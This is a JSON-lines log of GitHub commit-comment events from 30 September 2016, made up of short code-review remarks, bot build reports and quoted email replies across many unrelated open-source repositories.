{"id":"4645143493","type":"CommitCommentEvent","actor":{"login":"rvennam"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19246070,"position":null,"line":null,"path":null,"commit_id":"e63eee3d6bc38468524091ecd208de02efb2fb77","created_at":"2016-09-30T18:40:27Z","updated_at":"2016-09-30T18:40:27Z","body":"https://cl.ly/3L1V0T3a0u16"}},"created_at":"2016-09-30T18:40:27Z"}
{"id":"4645146594","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246078,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T18:40:59Z","updated_at":"2016-09-30T18:40:59Z","body":"According to p11-kit's [Changelog], v0.23.2 is a 'devel' release.  In that case, then, why was it added to Homebrew Core as the `stable` version of the formula?  "}},"created_at":"2016-09-30T18:40:59Z"}
{"id":"4645149069","type":"CommitCommentEvent","actor":{"login":"edallison"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":19246085,"position":11,"line":445,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-30T18:41:25Z","updated_at":"2016-09-30T18:41:25Z","body":"Added comment and renamed."}},"created_at":"2016-09-30T18:41:25Z"}
{"id":"4645150156","type":"CommitCommentEvent","actor":{"login":"edallison"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":19246089,"position":7,"line":441,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-30T18:41:37Z","updated_at":"2016-09-30T18:41:37Z","body":"Renamed."}},"created_at":"2016-09-30T18:41:37Z"}
{"id":"4645150303","type":"CommitCommentEvent","actor":{"login":"jcoyne"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19246090,"position":8,"line":156,"path":"app/services/curation_concerns/workflow/permission_query.rb","commit_id":"99d0b238c6ce1681b279aeea6ffbd595187166bf","created_at":"2016-09-30T18:41:38Z","updated_at":"2016-09-30T18:41:38Z","body":"can we use `Sipity::Agent.none`"}},"created_at":"2016-09-30T18:41:38Z"}
{"id":"4645152514","type":"CommitCommentEvent","actor":{"login":"edallison"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":19246096,"position":6,"line":440,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-30T18:42:04Z","updated_at":"2016-09-30T18:42:04Z","body":"Renamed."}},"created_at":"2016-09-30T18:42:04Z"}
{"id":"4645153898","type":"CommitCommentEvent","actor":{"login":"edallison"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":19246102,"position":4,"line":438,"path":"core/domain/collection_domain.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-30T18:42:19Z","updated_at":"2016-09-30T18:42:19Z","body":"Commented on and added tests."}},"created_at":"2016-09-30T18:42:19Z"}
{"id":"4645154548","type":"CommitCommentEvent","actor":{"login":"edallison"},"repo":{"name":"edallison/oppia"},"payload":{"comment":{"id":19246106,"position":4,"line":523,"path":"core/controllers/reader.py","commit_id":"c771181a8b90ee042582d267dfe2df1c3dcf398e","created_at":"2016-09-30T18:42:27Z","updated_at":"2016-09-30T18:42:27Z","body":"Done."}},"created_at":"2016-09-30T18:42:27Z"}
{"id":"4645157583","type":"CommitCommentEvent","actor":{"login":"garettarrowood"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19246112,"position":34,"line":65,"path":"spec/mongoid/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T18:43:02Z","updated_at":"2016-09-30T18:43:02Z","body":"Agreed. This appears to be the cleanest implementation yet."}},"created_at":"2016-09-30T18:43:02Z"}
{"id":"4645159226","type":"CommitCommentEvent","actor":{"login":"emcniece"},"repo":{"name":"driftyco/ionic-app-scripts"},"payload":{"comment":{"id":19246120,"position":null,"line":null,"path":null,"commit_id":"9ad370ade88a9ccb65832c0fabe2ef59351ad71e","created_at":"2016-09-30T18:43:22Z","updated_at":"2016-09-30T18:43:22Z","body":"Considering this batch of commits repairs a fairly unstable build pipe, it would be nice to get this out sooner rather than later 👍 "}},"created_at":"2016-09-30T18:43:22Z"}
{"id":"4645162462","type":"CommitCommentEvent","actor":{"login":"gabrielstuff"},"repo":{"name":"soixantecircuits/spacebro-client"},"payload":{"comment":{"id":19246127,"position":3,"line":3,"path":"dist/mdns.js","commit_id":"a568714f4d0582d1857a7d650d736a91d942bd8c","created_at":"2016-09-30T18:43:59Z","updated_at":"2016-09-30T18:43:59Z","body":"Not sure what you talk about :)\nLe ven. 30 sept. 2016 à 20:23, Massamba Diouf <notifications@github.com> a\nécrit :\n\n> This should be around a if (typeof window === undefined) isnt it? cc\n> @gabrielstuff <https://github.com/gabrielstuff>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/soixantecircuits/spacebro-client/commit/a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19245792>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AARZaTcONOuuNJq2jcm94y9PgwqMYV-fks5qvVOsgaJpZM4KLX1y>\n> .\n>\n"}},"created_at":"2016-09-30T18:43:59Z"}
{"id":"4645165636","type":"CommitCommentEvent","actor":{"login":"KarishmaMirpuri"},"repo":{"name":"KarishmaMirpuri/Project1"},"payload":{"comment":{"id":19246132,"position":null,"line":null,"path":null,"commit_id":"51a47aa2c408af61d97b85bc1f4b469eda7f9739","created_at":"2016-09-30T18:44:34Z","updated_at":"2016-09-30T18:44:34Z","body":"Website"}},"created_at":"2016-09-30T18:44:34Z"}
{"id":"4645167263","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":19246135,"position":null,"line":null,"path":null,"commit_id":"b006b825decdb2ab80147979cb2d53e2d49ea198","created_at":"2016-09-30T18:44:52Z","updated_at":"2016-09-30T18:44:52Z","body":"Ooh, you accidentally a thing"}},"created_at":"2016-09-30T18:44:52Z"}
{"id":"4645168466","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19246144,"position":null,"line":null,"path":null,"commit_id":"b5ad8be6e39cca05271b867339a2c0e0bed5c5ba","created_at":"2016-09-30T18:45:07Z","updated_at":"2016-09-30T18:45:07Z","body":"woops, sorry"}},"created_at":"2016-09-30T18:45:07Z"}
{"id":"4645170159","type":"CommitCommentEvent","actor":{"login":"theider"},"repo":{"name":"cyberspacewalker/test-html-1"},"payload":{"comment":{"id":19246145,"position":7,"line":13,"path":"README.md","commit_id":"18ff37efa2bdc35f38042310224e46e6122a92b1","created_at":"2016-09-30T18:45:25Z","updated_at":"2016-09-30T18:45:25Z","body":"Maybe it would look better if you didn't four-tick code blocks?\r\n"}},"created_at":"2016-09-30T18:45:25Z"}
{"id":"4645174333","type":"CommitCommentEvent","actor":{"login":"kiall"},"repo":{"name":"hpcloud/kubernetes"},"payload":{"comment":{"id":19246154,"position":8,"line":269,"path":"pkg/cloudprovider/providers/openstack/openstack_loadbalancer.go","commit_id":"8a1e760d0553d30c5522793d36106b39d3c2e2e5","created_at":"2016-09-30T18:46:12Z","updated_at":"2016-09-30T18:46:12Z","body":"Filtering Listeners by LB ID doesn't work in Liberty. We'll need to \"double check\" here - see https://github.com/kubernetes/kubernetes/pull/33768/files"}},"created_at":"2016-09-30T18:46:12Z"}
{"id":"4645177230","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19246161,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T18:46:44Z","updated_at":"2016-09-30T18:46:44Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1197 of 1197 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.14%25-green.svg)</a>\n"}},"created_at":"2016-09-30T18:46:44Z"}
{"id":"4645187607","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19246181,"position":5,"line":5,"path":"src/components/LoadingSpinner/LoadingSpinner.jsx","commit_id":"e63eee3d6bc38468524091ecd208de02efb2fb77","created_at":"2016-09-30T18:48:37Z","updated_at":"2016-09-30T18:48:37Z","body":"Shouldn't need to wrap this in <div>"}},"created_at":"2016-09-30T18:48:37Z"}
{"id":"4645193272","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19246198,"position":4,"line":5,"path":"src/routes/CreateDemo/components/CreateDemo.jsx","commit_id":"e63eee3d6bc38468524091ecd208de02efb2fb77","created_at":"2016-09-30T18:49:41Z","updated_at":"2016-09-30T18:49:41Z","body":"you don't need to do `../../../`\r\nWebpack resolves `src` as the root, so just do `components/LoadingSpinner`"}},"created_at":"2016-09-30T18:49:41Z"}
{"id":"4645194338","type":"CommitCommentEvent","actor":{"login":"keymone"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19246202,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T18:49:53Z","updated_at":"2016-09-30T18:49:53Z","body":"that is very surprising, especially in case when strict variables setting is turned on. is this logic intentional? would it make sense to add a conditional `throw` if strict variables is on?"}},"created_at":"2016-09-30T18:49:53Z"}
{"id":"4645203073","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"kreatifIT/redaxo_url"},"payload":{"comment":{"id":19246212,"position":null,"line":null,"path":null,"commit_id":"ddb7832977019c7122a1355e8a88f04e5593f797","created_at":"2016-09-30T18:51:34Z","updated_at":"2016-09-30T18:51:34Z","body":"Die Aufrufe der Extension Points ist hier verkehrt, weil Rewriter spezifisch. Die gehören eher hier in diese Class. https://github.com/kreatifIT/redaxo_url/blob/master/lib/Url/Rewriter/Yrewrite.php"}},"created_at":"2016-09-30T18:51:34Z"}
{"id":"4645203212","type":"CommitCommentEvent","actor":{"login":"jeremyf"},"repo":{"name":"projecthydra/curation_concerns"},"payload":{"comment":{"id":19246213,"position":8,"line":156,"path":"app/services/curation_concerns/workflow/permission_query.rb","commit_id":"99d0b238c6ce1681b279aeea6ffbd595187166bf","created_at":"2016-09-30T18:51:36Z","updated_at":"2016-09-30T18:51:36Z","body":"I didn't know that existed. I checked, and `Sipity::Agent.where('1=0')` and `Sipity::Agent.none` are both ActiveRelations."}},"created_at":"2016-09-30T18:51:36Z"}
{"id":"4645205602","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19246216,"position":21,"line":21,"path":"src/flask_app.py","commit_id":"3996b35c70d87f9065718342dca9e405c965c2d2","created_at":"2016-09-30T18:52:05Z","updated_at":"2016-09-30T18:52:05Z","body":"Why we need this here? If it's error, it should be rendered as error with code not 200"}},"created_at":"2016-09-30T18:52:05Z"}
{"id":"4645207630","type":"CommitCommentEvent","actor":{"login":"Quantumshark"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19246226,"position":null,"line":null,"path":null,"commit_id":"436d345cb9a2b9a1a9990574ab16013d8155923d","created_at":"2016-09-30T18:52:26Z","updated_at":"2016-09-30T18:52:26Z","body":"Should it be changed on the other deep river variants? The ones with missing boxes?"}},"created_at":"2016-09-30T18:52:26Z"}
{"id":"4645213510","type":"CommitCommentEvent","actor":{"login":"dooglio"},"repo":{"name":"m2osw/snapcpp"},"payload":{"comment":{"id":19246242,"position":null,"line":null,"path":null,"commit_id":"56970cfe979bd642ee72a8792c0dd6a8ed4a4c31","created_at":"2016-09-30T18:53:34Z","updated_at":"2016-09-30T18:53:34Z","body":"Yeah, I missed that one. Sorry about that."}},"created_at":"2016-09-30T18:53:34Z"}
{"id":"4645220111","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19246253,"position":null,"line":null,"path":null,"commit_id":"c24e8266666e9f04a3395eb5a08658de668c371a","created_at":"2016-09-30T18:54:50Z","updated_at":"2016-09-30T18:54:50Z","body":"This looks like maintenance stuff"}},"created_at":"2016-09-30T18:54:50Z"}
{"id":"4645221879","type":"CommitCommentEvent","actor":{"login":"agrignard"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":19246256,"position":null,"line":null,"path":null,"commit_id":"12651341732477ce9a5b16216ad6cc13e56a731d","created_at":"2016-09-30T18:55:11Z","updated_at":"2016-09-30T18:55:11Z","body":"What do you mean Nghi? Are you leaving the planet earth?"}},"created_at":"2016-09-30T18:55:11Z"}
{"id":"4645226597","type":"CommitCommentEvent","actor":{"login":"agrignard"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":19246269,"position":null,"line":null,"path":null,"commit_id":"12651341732477ce9a5b16216ad6cc13e56a731d","created_at":"2016-09-30T18:56:03Z","updated_at":"2016-09-30T18:56:03Z","body":"Oh ok I see!!! Thanks Julien for all the good work you did!!! "}},"created_at":"2016-09-30T18:56:03Z"}
{"id":"4645226698","type":"CommitCommentEvent","actor":{"login":"bistaSaroj"},"repo":{"name":"bistaSaroj/hello-world"},"payload":{"comment":{"id":19246271,"position":1,"line":1,"path":"README.md","commit_id":"26c6e1ef35846eddfc682c980ef9b3b014a196cd","created_at":"2016-09-30T18:56:04Z","updated_at":"2016-09-30T18:56:04Z","body":"![16437](https://cloud.githubusercontent.com/assets/22526680/19003250/fae0e908-871d-11e6-9cf1-4d6b2e7def05.jpg)\r\n\r\n"}},"created_at":"2016-09-30T18:56:04Z"}
{"id":"4645229346","type":"CommitCommentEvent","actor":{"login":"amaseda"},"repo":{"name":"ga-dc/wdi12"},"payload":{"comment":{"id":19246278,"position":null,"line":null,"path":null,"commit_id":"bfb4040779aafd2c6fdf194666095111d7949f98","created_at":"2016-09-30T18:56:31Z","updated_at":"2016-09-30T18:56:31Z","body":":+1:\r\n\r\nDo we want to quiz 'em on ActiveRecord? Or should we save that for the next checkpoint?"}},"created_at":"2016-09-30T18:56:31Z"}
{"id":"4645232928","type":"CommitCommentEvent","actor":{"login":"elijah"},"repo":{"name":"dev-sec/chef-ssh-hardening"},"payload":{"comment":{"id":19246290,"position":null,"line":null,"path":null,"commit_id":"7454b7b221da2b10e4e6994c4d27a45389bb395e","created_at":"2016-09-30T18:57:11Z","updated_at":"2016-09-30T18:57:11Z","body":"Yes, this PR is pretty old and if someone else wants to update it to cover\nall the old cases and conditions, and work in the modern era... great!  :)\n\n--e\n\n\nOn Fri, Sep 30, 2016 at 12:53 PM, Grant Ridder <notifications@github.com>\nwrote:\n\n> @elijah <https://github.com/elijah> looks like Systemd has been preferred\n> over Upstart for debain based systems for almost 2 yrs\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dev-sec/chef-ssh-hardening/commit/7454b7b221da2b10e4e6994c4d27a45389bb395e#commitcomment-19245301>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACok7zIIEvJD3QEWZpXa1QMwszzUfn9ks5qvUyHgaJpZM4IoDK8>\n> .\n>\n"}},"created_at":"2016-09-30T18:57:11Z"}
{"id":"4645234336","type":"CommitCommentEvent","actor":{"login":"kopr97"},"repo":{"name":"hak86/huawei_update_extractor"},"payload":{"comment":{"id":19246295,"position":null,"line":null,"path":null,"commit_id":"a7ac5dc08f9edb7acf132a8a1c8b72d392488bf5","created_at":"2016-09-30T18:57:27Z","updated_at":"2016-09-30T18:57:27Z","body":"can you make it for meui 4.0 ??? thanks"}},"created_at":"2016-09-30T18:57:27Z"}
{"id":"4645234598","type":"CommitCommentEvent","actor":{"login":"pcj"},"repo":{"name":"bazelbuild/rules_closure"},"payload":{"comment":{"id":19246298,"position":null,"line":null,"path":null,"commit_id":"5f7bbd7d721f31cc53fd536c719f5945aaeade35","created_at":"2016-09-30T18:57:30Z","updated_at":"2016-09-30T18:57:30Z","body":"FYI @jart, have you seen this in the 0.3.2rc3 release notes?\r\n\r\n```\r\nIf you maintain a rule that uses persistent workers, you'll have \r\n    to specify execution_requirements={\"supports-workers\": 1} in the \r\n    ctx.action that intends to run a tool with workers. The \r\n    WorkerSpawnStrategy will alert you with a warning message if you \r\n    forget to make this change and fallback to non-worker based \r\n    execution. \r\n```"}},"created_at":"2016-09-30T18:57:30Z"}
{"id":"4645240134","type":"CommitCommentEvent","actor":{"login":"jplock"},"repo":{"name":"yammer/dropwizard-auth-ldap"},"payload":{"comment":{"id":19246309,"position":11,"line":57,"path":"pom.xml","commit_id":"8f72425d27a6eac3c5b83d2c8fd446411b296e6c","created_at":"2016-09-30T18:58:34Z","updated_at":"2016-09-30T18:58:34Z","body":"you probably want to use `dropwizard-bom` here right?"}},"created_at":"2016-09-30T18:58:34Z"}
{"id":"4645241347","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19246311,"position":5,"line":2570,"path":"src/pocketmine/Server.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-30T18:58:49Z","updated_at":"2016-09-30T18:58:49Z","body":"?"}},"created_at":"2016-09-30T18:58:49Z"}
{"id":"4645242697","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19246313,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T18:59:05Z","updated_at":"2016-09-30T18:59:05Z","body":"Because they neglected to mention it on their homepage, the releases are all grouped together in one list & people forget to go rooting around Changelogs 🙈."}},"created_at":"2016-09-30T18:59:05Z"}
{"id":"4645247665","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"Team-OctOS/kraken_kernel_moto_shamu"},"payload":{"comment":{"id":19246322,"position":null,"line":null,"path":null,"commit_id":"80e3fd74b60804f255a58e93fcf13dc046387e65","created_at":"2016-09-30T19:00:01Z","updated_at":"2016-09-30T19:00:01Z","body":"wow such a useful commit title."}},"created_at":"2016-09-30T19:00:01Z"}
{"id":"4645247797","type":"CommitCommentEvent","actor":{"login":"joelverhagen"},"repo":{"name":"NuGet/NuGet.Client"},"payload":{"comment":{"id":19246323,"position":167,"line":211,"path":"test/NuGet.Clients.Tests/NuGet.CommandLine.Test/MSBuildUtilityTest.cs","commit_id":"0e684e79b40646dee7a3b5bcbd6107cf98b2e86a","created_at":"2016-09-30T19:00:02Z","updated_at":"2016-09-30T19:00:02Z","body":"nit: there are multiple test cases here, evidence by the unrelated assertions. This should be a `[Theory]` with `[InlineData]`."}},"created_at":"2016-09-30T19:00:02Z"}
{"id":"4645248339","type":"CommitCommentEvent","actor":{"login":"grahamhayes"},"repo":{"name":"hpcloud/kubernetes"},"payload":{"comment":{"id":19246324,"position":505,"line":808,"path":"pkg/cloudprovider/providers/openstack/openstack_loadbalancer.go","commit_id":"8a1e760d0553d30c5522793d36106b39d3c2e2e5","created_at":"2016-09-30T19:00:10Z","updated_at":"2016-09-30T19:00:10Z","body":"So, this will probably fail - when the ports / listeners are updated above, the code on lines 850 and 877 will try to recreate the security group, and its rules.\r\n\r\nThis will fail as the rules and groups exist, which will cause the lb to be deleted.\r\n\r\nWould it be cleaner to if exists go do update ? \r\n\r\nWe can ignore the sec groups due to other internal workarounds, and the fact we will not be adding Ingress Ports to existing lb after the fact."}},"created_at":"2016-09-30T19:00:10Z"}
{"id":"4645249453","type":"CommitCommentEvent","actor":{"login":"ivarconr"},"repo":{"name":"finn-no/unleash"},"payload":{"comment":{"id":19246326,"position":null,"line":null,"path":null,"commit_id":"4aeb87d66a053ed72a9e60b3a843b7898e8aebee","created_at":"2016-09-30T19:00:20Z","updated_at":"2016-09-30T19:00:20Z","body":":+1: "}},"created_at":"2016-09-30T19:00:20Z"}
{"id":"4645250643","type":"CommitCommentEvent","actor":{"login":"jshawl"},"repo":{"name":"ga-dc/wdi12"},"payload":{"comment":{"id":19246329,"position":null,"line":null,"path":null,"commit_id":"bfb4040779aafd2c6fdf194666095111d7949f98","created_at":"2016-09-30T19:00:34Z","updated_at":"2016-09-30T19:00:34Z","body":"I'm willing just the set up is such a pain idk it's brand new"}},"created_at":"2016-09-30T19:00:34Z"}
{"id":"4645254855","type":"CommitCommentEvent","actor":{"login":"joelverhagen"},"repo":{"name":"NuGet/NuGet.Client"},"payload":{"comment":{"id":19246334,"position":172,"line":216,"path":"test/NuGet.Clients.Tests/NuGet.CommandLine.Test/MSBuildUtilityTest.cs","commit_id":"0e684e79b40646dee7a3b5bcbd6107cf98b2e86a","created_at":"2016-09-30T19:01:19Z","updated_at":"2016-09-30T19:01:19Z","body":"Will both of these always be there on test machines (i.e. \"recent\" Mono installs)?"}},"created_at":"2016-09-30T19:01:19Z"}
{"id":"4645255132","type":"CommitCommentEvent","actor":{"login":"amaseda"},"repo":{"name":"ga-dc/wdi12"},"payload":{"comment":{"id":19246338,"position":null,"line":null,"path":null,"commit_id":"bfb4040779aafd2c6fdf194666095111d7949f98","created_at":"2016-09-30T19:01:22Z","updated_at":"2016-09-30T19:01:22Z","body":"Yeah, let's stick with basic ruby"}},"created_at":"2016-09-30T19:01:22Z"}
{"id":"4645256566","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19246341,"position":null,"line":null,"path":null,"commit_id":"29dc22241f086a81bac2d2f9b6b27d67539bda90","created_at":"2016-09-30T19:01:39Z","updated_at":"2016-09-30T19:01:39Z","body":"It's probably one of those \"let's go to +2.7 LLR and then go crashing down\" patches. ;)\r\nBut I will try again with other values or try tuning first."}},"created_at":"2016-09-30T19:01:39Z"}
{"id":"4645256648","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246342,"position":33,"line":33,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:01:40Z","updated_at":"2016-09-30T19:01:40Z","body":"TODO: We need to validate passed in features are available to the user"}},"created_at":"2016-09-30T19:01:40Z"}
{"id":"4645258029","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246346,"position":33,"line":33,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T19:01:53Z","updated_at":"2016-09-30T19:01:53Z","body":"(when they don't provide :all)"}},"created_at":"2016-09-30T19:01:53Z"}
{"id":"4645262498","type":"CommitCommentEvent","actor":{"login":"npmccallum"},"repo":{"name":"tiran/jose"},"payload":{"comment":{"id":19246355,"position":null,"line":null,"path":null,"commit_id":"ed292884b23b485fdc4f8f7e6d9544c8dbedec09","created_at":"2016-09-30T19:02:44Z","updated_at":"2016-09-30T19:02:44Z","body":"1. I'm not sure this is the right approach. This will force an openssl dependency.\r\n2. This patch will actually cause crashes since it loads the library and then immediately unloads it. The hooks will now point to invalid memory.\r\n\r\nI think we have two options.\r\n\r\n1. Make a jose_openssl_register_hooks() function and don't use constructors. Applications that want to use openssl will then need to call this function. Same with zlib.\r\n\r\n2. Use the gcc/clang flag (I forget what it is) to force it to link the libraries anyway. This flag will also need to go into the .pc files."}},"created_at":"2016-09-30T19:02:44Z"}
{"id":"4645264501","type":"CommitCommentEvent","actor":{"login":"chrisgray"},"repo":{"name":"yammer/dropwizard-auth-ldap"},"payload":{"comment":{"id":19246359,"position":11,"line":57,"path":"pom.xml","commit_id":"8f72425d27a6eac3c5b83d2c8fd446411b296e6c","created_at":"2016-09-30T19:03:07Z","updated_at":"2016-09-30T19:03:07Z","body":"Wow, I goofed. Thanks @jplock I'll make that change now"}},"created_at":"2016-09-30T19:03:07Z"}
{"id":"4645281045","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19246410,"position":26,"line":37,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T19:06:25Z","updated_at":"2016-09-30T19:06:25Z","body":"@renier Could the order items span multiple orders?"}},"created_at":"2016-09-30T19:06:25Z"}
{"id":"4645281439","type":"CommitCommentEvent","actor":{"login":"puzrin"},"repo":{"name":"a-rodin/pica"},"payload":{"comment":{"id":19246413,"position":4,"line":17,"path":"lib/resize_js_ww.js","commit_id":"6a03dbde1cc1b3ff2ad35f201dbdbbbbaef428fd","created_at":"2016-09-30T19:06:29Z","updated_at":"2016-09-30T19:06:29Z","body":"```js\r\nvar NEED_SAFARI_FIX = false;\r\n\r\ntry {\r\n  if (typeof navigator !== undefined) NEED_SAFARI_FIX = (navigator.userAgent.indexOf('Safari') !== -1);\r\n} catch {}\r\n```"}},"created_at":"2016-09-30T19:06:29Z"}
{"id":"4645287137","type":"CommitCommentEvent","actor":{"login":"bangsi"},"repo":{"name":"bangsi/ngplayground.site"},"payload":{"comment":{"id":19246420,"position":null,"line":null,"path":null,"commit_id":"77036c1dd5a3c614fd4c512ff9b2934193733523","created_at":"2016-09-30T19:07:33Z","updated_at":"2016-09-30T19:07:33Z","body":"cname set up"}},"created_at":"2016-09-30T19:07:33Z"}
{"id":"4645290665","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19246424,"position":21,"line":21,"path":"src/flask_app.py","commit_id":"3996b35c70d87f9065718342dca9e405c965c2d2","created_at":"2016-09-30T19:08:03Z","updated_at":"2016-09-30T19:08:03Z","body":"And one more thing, if we have results and error, it should be the same format all the way. (camelCase)\r\nFor example success response:\r\n```json\r\n{\r\n    \"status\": \"success\",\r\n    \"result\": [...]\r\n}\r\n```\r\nfor error:\r\n```json\r\n{\r\n    \"status\": \"error\",\r\n    \"error\": \"ErrorMessage\"\r\n}\r\n```"}},"created_at":"2016-09-30T19:08:03Z"}
{"id":"4645290752","type":"CommitCommentEvent","actor":{"login":"avluis"},"repo":{"name":"PaoloRotolo/AppIntro"},"payload":{"comment":{"id":19246425,"position":4,"line":20,"path":".github/ISSUE_TEMPLATE.md","commit_id":"d70f69d46ed64a69663d5825764df5d9d7a66432","created_at":"2016-09-30T19:08:04Z","updated_at":"2016-09-30T19:08:04Z","body":"shouln't > shouldn't"}},"created_at":"2016-09-30T19:08:04Z"}
{"id":"4645293181","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19246430,"position":21,"line":21,"path":"src/flask_app.py","commit_id":"3996b35c70d87f9065718342dca9e405c965c2d2","created_at":"2016-09-30T19:08:34Z","updated_at":"2016-09-30T19:08:34Z","body":"Use lowerCamelCase for naming fields in json"}},"created_at":"2016-09-30T19:08:34Z"}
{"id":"4645296781","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"elastic/elasticsearch-net"},"payload":{"comment":{"id":19246434,"position":33,"line":33,"path":"src/Tests/Document/Multiple/Bulk/BulkInvalidVersionApiTests.cs","commit_id":"d2491a48372242b8a436539c6892240a75fbb83a","created_at":"2016-09-30T19:09:17Z","updated_at":"2016-09-30T19:09:17Z","body":"If one of the bulk results doesn't contain a version it will return correctly. If both items specify a version of 0 the test will fail."}},"created_at":"2016-09-30T19:09:17Z"}
{"id":"4645309050","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19246456,"position":null,"line":null,"path":null,"commit_id":"53b88845f5530d03b5c2770cc05ad9e506b7753b","created_at":"2016-09-30T19:11:47Z","updated_at":"2016-09-30T19:11:47Z","body":"Consider White d4 and Black d5 e6 f5.\r\ne6 is backward, and will simply have the backward penalty,\r\n(and not the unsupported bonus)\r\n\r\nBut this simplification is interesting. It was tried some time ago, but result might be different this time.\r\n\r\nIf you want to drop all the unsupported penalties, like in your other test, you should also decrease the backward and the isolated pawn penalty.\r\n\r\n\r\n"}},"created_at":"2016-09-30T19:11:47Z"}
